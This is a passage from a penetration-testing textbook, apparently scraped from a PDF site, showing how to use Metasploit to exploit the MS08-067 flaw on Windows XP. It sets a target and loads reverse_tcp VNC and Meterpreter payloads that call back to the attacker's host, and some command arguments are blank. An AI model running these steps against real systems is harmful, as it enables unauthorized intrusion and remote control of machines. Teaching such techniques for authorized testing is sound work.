Ethical Hacking and Penetration Testing Guide
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- Specific Scanners
- Compromising a Windows Host with Metasploit
|
Specific Scanners
In the auxiliary modules, you will also find specific scanners related to almost every protocol ser- vice FTP, SSH, SQL, etc. I would suggest you take a look at the following link, to find informa- tion about auxiliary modules especially related to scanning. Compromising a Windows Host with Metasploit So now that you are familiar with the usage of Metasploit, I will walk you through the process of exploiting a Windows machine and gaining access to it. The target we will exploit would be running a Windows XP Service Pack 2 operating system. The vulnerability that we would exploit would be a remote code execution vulnerability ( ms08 _ 067 _ netapi ). The advisory for this vulnerability was released in October 2008. However, it’s still very commonly found in the Windows XP operating system. Other OSs such as Windows 2000 and Windows Servers 2003 are also vulnerable. The vulnerability is exploited when an attacker sends a specially crafted RPC request which forces the program to behave in a manner it was never intended to be, so it can be tricked to behave how the attacker wants it to be, by crafting RPC requests that overruns a fixed-length buffer inside the code, resulting in memory corruption which can be tricked to execute arbitrary code inside the machine. Nmap contains a built-in script called smb-check-vulns that could be used to find all the tar- gets vulnerable to this attack. Remote Exploitation ◾ 185 The command would be as follows: nmap The output of the script shows that our target is vulnerable to ms08 _ 067 _ netapi exploit. Alternatively, you can also use Nessus to find it, but I prefer nmap as it’s faster. So now we know that our particular target is vulnerable to ms08 _ 067 _ netapi . Let’s fire up Metasploit by executing the msfconsole from the shell. Once we are in Metasploit, we will use the search command to search for that particular exploit: search ms08_067_netapi The output shows us the path of the exploit. We would load the exploit by typing the following command: use exploit/windows/smb/ms08_067_netapi 186 ◾ Ethical Hacking and Penetration Testing Guide The exploit has now loaded. Next, we use the “show options” command to see the avail- able options. We can see three options RHOST, RPORT, and SMBPIPE. The other two options are already predefined, and we only need to set the RHOST, which would be our target IP. So we would execute the following command: set rhost Note : If the SMB service is running upon a different port, we would need to specify that port with the set RPORT command. Now we have our RHOST set. We would need to set a payload. To recall, a payload is the code that we would like to run on the victim’s computer. We would set the payload to windows/ vncinject/reverse _ tcp . This will bring back a vnc connection from the victim’s host. We will use the following command to set a payload: msf> set payload/windows/vncinject/reverse_tcp. Let’s type “show options“ to see what options are available inside of this payload. Since we have chosen reverse _ tcp , we would need to specify a LHOST so that the victim’s machine could initiate a connection to our machine. So, we would set the LHOST to our IP. msf> set LHOST We would verify the settings by using the “show options” command. In my case, the settings would look as follows: Now that we have everything set up, we would use the “exploit” command to execute the exploit. After the exploit has been completed, Metasploit will open up a VNC session through which we can gain full control of the victim’s machine. Remote Exploitation ◾ 187 Obtaining a VNC session or simply a command prompt would not help us much; therefore, we would use another payload called “Meterpreter.” Meterpreter is a powerful script that allows us to perform data harvesting, privilege escalation, and various other types of attacks on the victim machine. The next chapter, “Postexploitation,” (Chapter 9) is dedicated to meterpreter, where we will learn to use it to further penetrate the network. To use Meterpreter, we would need to use the following command: set payload windows/meterpreter/reverse_tcp Again, we would set the LHOST to our local machine’s IP address and finally use the “exploit” command to open up a Meterpreter session. |